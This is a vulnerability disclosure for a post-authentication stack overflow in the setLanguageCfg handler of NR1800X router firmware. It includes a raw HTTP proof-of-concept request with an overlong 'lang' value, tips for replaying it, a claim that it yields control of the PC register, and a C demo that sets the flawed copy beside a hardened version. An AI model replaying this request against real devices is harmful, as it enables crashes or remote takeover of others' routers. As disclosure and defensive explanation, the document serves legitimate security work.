Hi, we found a post-authentication stack buffer overflow in the **NR1800X** (firmware version V9.3.5u.6369_B20220309) and are reporting it to you at the first opportunity.
The bug is in the function setLanguageCfg of /cgi-bin/cstecgi.cgi, where the attacker controls the `lang` parameter. The length of `lang` is not checked, and it is copied directly into a stack buffer via sprintf (at line 17).
PoC
```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.17.220
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: Cookie=uid=1234
Content-Length: 5
Content-Type: application/x-www-form-urlencoded

{"topicurl": "setLanguageCfg", "lang" : "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}
```

Note that the Content-Length in this capture does not match the JSON body; when replaying, set it to the actual body length (or let the HTTP client compute it), and send the request with a valid session cookie, since the handler is only reachable after authentication.
The PC register can be hijacked (it is overwritten with attacker-controlled bytes from `lang`), which means the bug can be turned into remote code execution.
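The unchecked-copy pattern described in this report, shown beside a hardened form, as an added example that is not the firmware's code or the reporter's PoC. The buffer size (64), the frame layout, the function names and the placeholder return address are assumptions; the handler's stack frame is modelled as a struct so the overwrite of the saved return address can be observed without smashing this program's own stack, and the vulnerable copy is bounded to that frame only so the demo stays well-defined (the real handler has no such bound).

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

/* Assumed size of the local buffer; the real size in the firmware is not given. */
#define LANG_BUF_SIZE 64

/* Placeholder for the saved return address that a real frame would hold. */
#define FAKE_RA ((uintptr_t)0x00401000)

/* Model of the handler's stack frame: the local buffer followed by the saved
 * return address, exactly the order an overflow of lang_buf walks through. */
struct frame {
    char lang_buf[LANG_BUF_SIZE];
    uintptr_t saved_ra;
};

/* Vulnerable pattern (reconstructed): the attacker-controlled lang is formatted
 * into the fixed-size buffer with no length check. Formatting into the whole
 * frame stands in for sprintf() running past lang_buf into saved_ra. */
void set_language_vuln(struct frame *f, const char *lang)
{
    f->saved_ra = FAKE_RA;
    snprintf((char *)f, sizeof *f, "%s", lang);   /* spills out of lang_buf */
}

/* Hardened form: bound the write to the buffer and treat truncation as an
 * error instead of silently cutting the value short. Returns 0 on success,
 * -1 if lang (plus its NUL) does not fit. */
int set_language_safe(struct frame *f, const char *lang)
{
    f->saved_ra = FAKE_RA;
    int w = snprintf(f->lang_buf, sizeof f->lang_buf, "%s", lang);
    if (w < 0 || (size_t)w >= sizeof f->lang_buf)
        return -1;
    return 0;
}

/* 1 if the saved return address slot no longer holds its original value. */
int ra_clobbered(const struct frame *f)
{
    return f->saved_ra != FAKE_RA;
}

/* Constructed input mirroring the report's request body: 200 bytes of 'a'. */
const char *poc_lang(void)
{
    static char lang[201];
    if (lang[0] == '\0') {
        memset(lang, 'a', 200);
        lang[200] = '\0';
    }
    return lang;
}

int main(void)
{
    struct frame f;

    set_language_vuln(&f, poc_lang());
    printf("vulnerable handler: saved_ra = 0x%lx (%s)\n",
           (unsigned long)f.saved_ra, ra_clobbered(&f) ? "clobbered" : "intact");

    int rc = set_language_safe(&f, poc_lang());
    printf("hardened handler:   rc = %d, saved_ra %s\n",
           rc, ra_clobbered(&f) ? "clobbered" : "intact");

    rc = set_language_safe(&f, "en");
    printf("hardened handler:   rc = %d for \"%s\"\n", rc, f.lang_buf);
    return 0;
}
```

With the 200-byte value the vulnerable handler leaves the saved return address filled with 0x61 bytes, which is the PC hijack the report describes; the hardened handler rejects the same input and leaves the frame intact, while a normal language code such as "en" is accepted unchanged.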